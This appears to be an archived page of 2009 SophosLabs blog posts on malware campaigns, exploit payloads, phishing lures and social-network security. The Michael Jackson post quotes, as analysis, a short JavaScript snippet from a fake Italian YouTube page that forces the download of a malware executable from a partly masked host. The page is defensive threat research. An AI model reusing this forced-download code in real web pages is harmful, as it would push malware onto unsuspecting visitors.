SophosLabs blog

SophosLabs informs on dodgy files

I have just returned from the Queensland Hi Tech Crime Symposium hosted by the Queensland State Crime Operations Command, where the hot topics of eFraud and eCrime were discussed.

My presentation on the rising abuse of trusted file formats such as Word, PDF and Flash was well received (despite the fact I’m no public speaker extraordinaire!) The other presentations discussed the variety, extent and sophistication of eCrime plaguing our modern connected society, and ways in which law enforcement, government, the private sector and, most importantly netizens can stem the tide.

Of particular interest were the taxonomy of two separate eCrime cases which showed that even the tech-savvy can, and do, fall victim to phishing and eFraud, often perpetrated by not-so-technically-endowed individuals or groups.

Overall the conference was of great benefit to all involved and shows how cooperation between various public, private and government bodies can yield benefits for everyone.

Posted on July 10th, 2009 by Pete, SophosLabs AU
Filed under: General

                                         

Troj/BHO-MQ more than meets the eye

One of the most difficult types of malware SophosLabs analysts face is the ones that appear to do nothing. Last week a colleague came across a file that appeared to do nothing and ask me to help dig deeper.

He found what looks like JavaScript in the Code Section

The rest of the code manipulates what Internet Explorer sees and will insert this JavaScript into pages.

The JavaScript is heavily obfuscated and decodes to:

So far SophosLabs have seen 7 different domains used by variants of Troj/BHO-MQ all of which use
/fcontent/index.html. The websites linked to are all Russian porn sites with the following enticing graphics.

Why is the Trojan doing this? I suspect that this Trojan is part of pay-per-click scam and is used to generate revenue for a hacking gang.

Posted on July 9th, 2009 by Pob, SophosLabs, UK
Filed under: General, Malware, Web

                                         

Recession Bites Hard For The Rich And Famous

Today we have seen a couple of html files which redirect to an online shop selling fake watches (or as they like to call it - “a copy of the original”)

Sophos detects these files as JS/Agent-KLD and JS/Agent-KLE respectively.

When these html files are opened in a browser, the embedded link goes to the shop’s main webpage (access to which is blocked by Sophos’s web appliance).

From its dynamic advertising, we see some famous faces like Bill Gates, Brad Pitt and Angelina Jolie. While we are guessing they don’t get paid for their images to be used, it’s pretty certain that they DON’T buy fake watches from this website. ;-)

Neither should you!

Posted on July 8th, 2009 by Liang Zhang, SophosLabs AU
Filed under: General

                                         

Update on the DirectShow vulnerability du jour

As already mentioned by GC here, there is a DirectShow vulnerability currently in the wild.

Samples seen thus far are being detected as Exp/VidCtl-A and Mal/JSShell-D. Several new variants of the exploit scripts are being proactively detected with these names. Additionally, runtime buffer overflow protection provides additional behavioral protection.

The payloads attackers are attempting to infect victims vary between attacks, but include:

• Mal/EncPk-CK
• Mal/Behav-321
• Troj/PWS-ASW
• Mal/DelpDldr-C
• Sus/ComPack-C

Additionally, ensuring the runtime protection offered by HIPs is enabled provides another level of protection to proactively detect new attacks.

For those of you who want the security provided by Microsoft’s workaround, but don’t want to fiddle with the registry manually, Microsoft has provided some interesting tools that seem to simplify the procedure to a turnkey solution here.

Posted on July 7th, 2009 by mjc, SophosLabs Canada
Filed under: Exploits, Malware, Vulnerabilities

                                         

4th of July malware campaign trends

A quick search through our blogs for previous 4th of July malware campaigns for the past three years show:

• 4th of July 2007, we experienced a large e-card campaign which we then detected as Troj/JSEcard-A and Mal/Dorf-C.
• 4th of July 2008, we experienced another large Dorf campaign this time attempting to show the users a video of fireworks; we detected this as Troj/Dorf-BP and Mal/ObfJS-AY.
• 4th of July 2009, we experienced a Waled campaign attempting to show the users a YouTube video of fireworks; we detected this as Mal/WaledPak-G and Mal/WaledJS-A.

My predictions for 4th of July 2010 based on the experiences of the past three years - possibly another Waled campaign this time focusing on something other than fireworks or e-cards. Maybe something more creative than fireworks? It’s getting a bit stale.

Also the campaign may not necessarily be another Waled, but given how long Dorf has been used and continues to be used, reusing Waled may not be unrealistic. The malware authors will just tweak the code and redeploy.

Posted on July 6th, 2009 by Numaan Huq, SophosLabs Canada
Filed under: General, Malware

                                         

4th of July Waled

No surprises here, a new Waled campaign with the US Independence Day theme. When the user clicks on the YouTube video link, it offers to download an .exe file on the user’s computer instead of displaying a video.

Funny thing is that they say on the webpage “The largest firework happened this Saturday”, and this campaign is being spammed out on Friday, July 3rd. Clearly the Waled group isn’t paying attention to international timezones. Sophos detects this new Waled campaign as Mal/WaledPak-G and Mal/WaledJs-A.

Posted on July 3rd, 2009 by Numaan Huq, SophosLabs Canada
Filed under: Malware

                                         

Amazon and Sophos

The work that the guys carry out in the lab is pretty varied. We do everything you would expect - analyse malware, publish descriptions and protection, analyse spam, check out websites that are supposedly compromised, answer plenty of customer queries and research latest malware techniques. That’s the short list. Then I could talk about all the projects that the analysts work on, developing new technologies and then getting them into the product to help with detecting all the latest threats - even crystal ball gazing to see where the threat might be moving and designing pre-emptive technologies for the Sophos product range.

Every year there are new products developed with the latest detection technologies. This year is no exception and Sophos is about to embark on a Beta program for its new products and we are looking for customers to join that program to help evaluate the latest offerings.

If you are interested in taking part them please check out http://www.sophos.com/products/beta/ and join in the program. I’m told there are Amazon vouchers available for those who provide feedback - I wonder if they’ll let me join.

Posted on July 1st, 2009 by Stuart Taylor, Manager SophosLabs UK
Filed under: General

                                         

International MJ Conspiracies With a Payload

Yes, sadly we’re still talking about people taking advantage of Michael Jackson’s death.

This week, we’ve seen a rise in malware purporting to show images and video leading up to Michael’s death — many malware groups around the world appear to be getting in on the act.

Anyone taking the standard precautions shouldn’t have difficulty avoiding this one — just make sure Javascript is disabled by default (so you don’t get infected by Mal/ObfJS-BP as found in the 1×1 iFrame — it tries to download and run the EXE via an old Acrobat Reader vulnerability), and don’t run the linked EXE manually (everyone knows that clicking on EXEs on a web page is a bad idea, right?) and get infected with Troj/ZBot-GJ.

While most of the malware is following this format, the Italians are getting a bit more creative:

For those of you following along who don’t read Italian, my rough translation of the text is as follows:

The whole world was devastated when and Michael Jackson was found dead.
His death is surrounded with mystery; no one knows what happened, only that the mega star is dead.
But not just that. The following video clip shows Michael’s last moments and the cruel truth about his death.
Watch it and do not forget to leave a flower on Michael’s grave.
SHOCKING IMAGES! This video is not suited for children under the age of 16

This message contains a link to the following site:

The site, purporting to be an Italian YouTube site, throws up an error saying that you need to update your Flash player to view the video… with a download link to fake Codec malware Troj/ZBot-GK. It also contains the following Javascript code that I found very interesting:


<!--
function doDownload() {
/Genera il link al file zippato da scaricare
(tr. Generate the link to the zipped file to download)
location.href = “http://youtube****.com/Codec/120.exe”;
}

/Fa partire il download dopo 10 secondi da quando
/l’intermprete JavaScript ha rilevato la funzione
(tr. The download starts 10 seconds after the JavaScript interpreter has taken over the function)
window.setTimeout(”doDownload()”, 4000);
/–>

This associated code essentially forces the linked codec to download and possibly run after ten seconds of inactivity on the page. What I find interesting is that the script is well formatted and commented in Italian, and appears to be designed to force download a zip file. This implies that you can expect to see other Italian-targeted malware of this kind in the future.

You’re still safe as long as you keep Javascript disabled for untrusted websites and don’t download the EXE. But downloading the “update” can be a bit more tempting than the previous example.

Not to worry… Sophos blocks the e-mails, the websites, and the malware, so reading this blog is likely the closest you’ll come to this sordid display of opportunism.

Posted on June 30th, 2009 by Andrew Ludgate, Threat Researcher, SophosLabs, Canada
Filed under: Malware, Spam

                                         

Social networking and security

I saw yet another article today on the rise in cybercrime on Facebook http://www.reuters.com/article/newsOne/idUSTRE55S55820090629

We’ve been talking about the dangers of Facebook and Twitter for a couple of years now [1], [2], [3], [4], [5], [6].

This seems to be bringing back to the forefront the argument of locking down business networks to prevent access to these sites. Previous arguments have usually been limited to productivity drains, but as malware on these sites rise, security should be the overriding concern. The potential for information leaks from employees posting to these sites is increasing, as well as the possible damage from malware being sent from a corporation’s compromised network. And there’s still the whole cybersquatting issue, which also seems to be rising. There are companies that have been targeted with fake Facebook and Twitter profiles, which could potentially damage the company’s reputation.

With these considerations, should businesses lock down access to these sites at the risk of upsetting their employees?

Posted on June 30th, 2009 by Beth Jones, SophosLabs US
Filed under: General, Web

                                         

“She’s armed with technology”

… but is she security conscious?

I was reading my RSS reader when I came across this blog article from the WSJ: http://blogs.wsj.com/digits/2009/06/26/how-moms-feel-about-social-media/?mod=rss_WSJBlog and it really got me thinking. How many of these sites have been set up securely? How many of these moms are putting up their private details not thinking about the possible consequences of what happens if the site gets compromised?

Many of these sites are set up by women (and men) with the best of intentions.  They either have a bit of tech knowledge or they hire someone with the coding experience to set up the website. They make sure that they have some of the bells and whistles like private messaging, email lists, and message boards. The user interfaces are scrutinized to make sure they are user-friendly and easy to navigate. But how much attention is given to whether there are vulnerabilities in the server that is running the software? Who maintains the server and makes sure it’s patched and has AV on it? Is the software itself buggy and vulnerable to attack? Are they doing enough to protect their users?

Here’s a great example. I’m a member of several mom-centric social networks. One of which was in fact compromised. The servers had been compromised with an SQL injection attack. The hackers then trashed many of the templates for the site (fortunately they had decent backups and could restore the templates) and stole all the user information, including things like birthdays, usernames, passwords and email addresses. They sent a broadcast once control of the site was regained, but the damage was done. Every user had been compromised and their info was out in the world.

All except mine.

I never give correct personal details (such as birthdays) to websites.  While I appreciate that in general such information is collected for demographic stats, there really is no need for specific birthdays, mother’s maiden names, etc. More people should really think about what it is they put on the enrollment forms. With a name, address and birthdate, identities can be stolen.

Security here is two-fold. Not only should the site be secure, but the people using them should also be wary and on the lookout for links from people they may  or may not know, not giving out personal details and using secure passwords that are not the same as their email passwords or banking passwords.

Posted on June 29th, 2009 by Beth Jones, SophosLabs US
Filed under: General, Web